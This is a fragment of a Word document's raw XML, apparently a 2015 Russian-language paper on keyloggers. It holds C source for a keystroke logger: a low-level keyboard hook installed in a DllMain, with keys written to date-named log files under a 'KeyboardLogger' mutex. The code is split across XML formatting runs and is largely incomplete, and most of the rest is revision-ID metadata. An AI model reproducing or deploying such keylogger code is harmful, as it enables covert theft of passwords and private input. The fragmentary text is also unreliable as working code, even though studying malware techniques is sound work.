winID))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strcpy(buf + 1, "\r\n");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WriteFile(file, g_buf, strlen(g_buf), &amp;written,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else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strcat(g_buf, "[unknown]\r\n");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WriteFile(file, g_buf, strlen(g_buf), &amp;written,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(GetKeyState(VK_LSHIFT) &amp; GetKeyState(VK_RSHIFT) &amp; 0x0100)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PostQuitMessage(0);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CallNextHookEx(hook, nCode, wParam, lParam);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CreateLogFile()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fileName[MAX_PATH];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SYSTEMTIME st;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DWORD fileNum = 1;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GetLocalTime(&amp;st);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GetDateFormat(LOCALE_SYSTEM_DEFAULT, 0, &amp;st, "dd.MM.yy", fileName, MAX_PATH);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* ptrAfterSyl_ = fileName + strlen(fileName) + 1;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strcat(fileName, "_1.txt");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char path[MAX_PATH];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strcpy(path, glPath);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strcat(path, fileName);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file = CreateFile(path, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL,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while (GetLastError() == ERROR_FILE_EXISTS)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fileNum++;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wsprintf(ptrAfterSyl_, "%d", fileNum);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strcat(fileName, ".txt");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strcpy(path, glPath);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strcat(path, fileName);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file = CreateFile(path, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, 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file != INVALID_HANDLE_VALUE;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>BOOL AP</w:t>
      </w:r>
      <w:r w:rsidR="007403D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)</w:t>
      </w:r>
      <w:r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HANDLE mutex = CreateMutex(NULL, FALSE, "KeyboardLogger");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRPr="00267D34" w:rsidRDefault="00267D34" w:rsidP="007403D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if (GetLastError() == ERROR_ALREADY_EXISTS || GetLast</w:t>
      </w:r>
      <w:r w:rsidR="007403D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error() == ERROR_ACCESS_DENIED)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRPr="00267D34" w:rsidRDefault="007403D3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sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRPr="00267D34" w:rsidRDefault="007403D3" w:rsidP="007403D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if (!CreateLogFile()){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ReleaseMutex(mutex);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return 1;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HINSTANCE instance = GetModuleHandle(NULL);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hook = SetWindowsHookEx(WH_KEYBOARD_LL, LowLevelKeyboardHook, instance, 0);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MSG msg;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wh</w:t>
      </w:r>
      <w:r w:rsidR="007403D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ile (GetMessage(&amp;msg, 0, 0, 0))</w:t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TranslateMessage(&amp;msg);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DispatchMessage(&amp;msg);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ReleaseMutex(mutex);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UnhookWindowsHookEx(hook);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRPr="00267D34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tab/>
        <w:t>CloseHandle(file);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRPr="007403D3" w:rsidRDefault="00267D34" w:rsidP="00267D34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67D34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>return TRUE;}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00267D34" w:rsidRPr="0074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478" w:rsidRDefault="008E3478" w:rsidP="00E47FA2">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="008E3478" w:rsidRDefault="008E3478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478" w:rsidRDefault="008E3478" w:rsidP="00E47FA2">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="008E3478" w:rsidRDefault="008E3478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1E8E55A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E90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05C5"/>
    <w:rsid w:val="000872BA"/>
    <w:rsid w:val="000B3353"/>
    <w:rsid w:val="000D413B"/>
    <w:rsid w:val="001000EB"/>
    <w:rsid w:val="001673FA"/>
    <w:rsid w:val="001F6F39"/>
    <w:rsid w:val="00205E97"/>
    <w:rsid w:val="00251ACD"/>
    <w:rsid w:val="00267D34"/>
    <w:rsid w:val="002B4BB4"/>
    <w:rsid w:val="002B50CE"/>
    <w:rsid w:val="002E7A2E"/>
    <w:rsid w:val="00335965"/>
    <w:rsid w:val="00347FDC"/>
    <w:rsid w:val="00383DC8"/>
    <w:rsid w:val="00393818"/>
    <w:rsid w:val="003E2ED4"/>
    <w:rsid w:val="00403476"/>
    <w:rsid w:val="00430205"/>
    <w:rsid w:val="004C2FC5"/>
    <w:rsid w:val="005155C5"/>
    <w:rsid w:val="00532646"/>
    <w:rsid w:val="00546DFB"/>
    <w:rsid w:val="005478C2"/>
    <w:rsid w:val="005739EC"/>
    <w:rsid w:val="00586F70"/>
    <w:rsid w:val="005B1FF6"/>
    <w:rsid w:val="00601F1A"/>
    <w:rsid w:val="00637F4E"/>
    <w:rsid w:val="006832EA"/>
    <w:rsid w:val="006A38EE"/>
    <w:rsid w:val="006B3D75"/>
    <w:rsid w:val="006D47FF"/>
    <w:rsid w:val="0070493C"/>
    <w:rsid w:val="00712C5A"/>
    <w:rsid w:val="0072566D"/>
    <w:rsid w:val="007403D3"/>
    <w:rsid w:val="00743E0B"/>
    <w:rsid w:val="0077143A"/>
    <w:rsid w:val="007E450A"/>
    <w:rsid w:val="007F45AA"/>
    <w:rsid w:val="00836C5E"/>
    <w:rsid w:val="00891D34"/>
    <w:rsid w:val="00896423"/>
    <w:rsid w:val="008D2F8C"/>
    <w:rsid w:val="008E3478"/>
    <w:rsid w:val="008E387E"/>
    <w:rsid w:val="008E593B"/>
    <w:rsid w:val="008F6440"/>
    <w:rsid w:val="00921EEF"/>
    <w:rsid w:val="009456B2"/>
    <w:rsid w:val="0095536E"/>
    <w:rsid w:val="00984B5C"/>
    <w:rsid w:val="009A6EA9"/>
    <w:rsid w:val="009C1400"/>
    <w:rsid w:val="00A65973"/>
    <w:rsid w:val="00A9269C"/>
    <w:rsid w:val="00AC4812"/>
    <w:rsid w:val="00AD1433"/>
    <w:rsid w:val="00B709E0"/>
    <w:rsid w:val="00BC2E0F"/>
    <w:rsid w:val="00BF2EC8"/>
    <w:rsid w:val="00C203E3"/>
    <w:rsid w:val="00C60C89"/>
    <w:rsid w:val="00C63D18"/>
    <w:rsid w:val="00C774A0"/>
    <w:rsid w:val="00C8742B"/>
    <w:rsid w:val="00C949A2"/>
    <w:rsid w:val="00CA58F9"/>
    <w:rsid w:val="00D405F0"/>
    <w:rsid w:val="00DB20E2"/>
    <w:rsid w:val="00DC2314"/>
    <w:rsid w:val="00DF6EF9"/>
    <w:rsid w:val="00E47FA2"/>
    <w:rsid w:val="00E8372C"/>
    <w:rsid w:val="00EC7BFF"/>
    <w:rsid w:val="00ED07C6"/>
    <w:rsid w:val="00EE0EA0"/>
    <w:rsid w:val="00F02139"/>
    <w:rsid w:val="00F534A9"/>
    <w:rsid w:val="00F75428"/>
    <w:rsid w:val="00F97D6F"/>
    <w:rsid w:val="00FE0B31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F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6F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32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832E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DLL_inje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curelist.ru/analysis/77/klaviaturny-e-shpiony-varianty-reali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0;&#1077;&#1081;&#1083;&#1086;&#1075;&#1077;&#1088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D6D59-4269-4A40-BCC6-E9468619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27</Pages>
  <Words>4562</Words>
  <Characters>26005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33</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-03-22T12:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-05-19T20:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>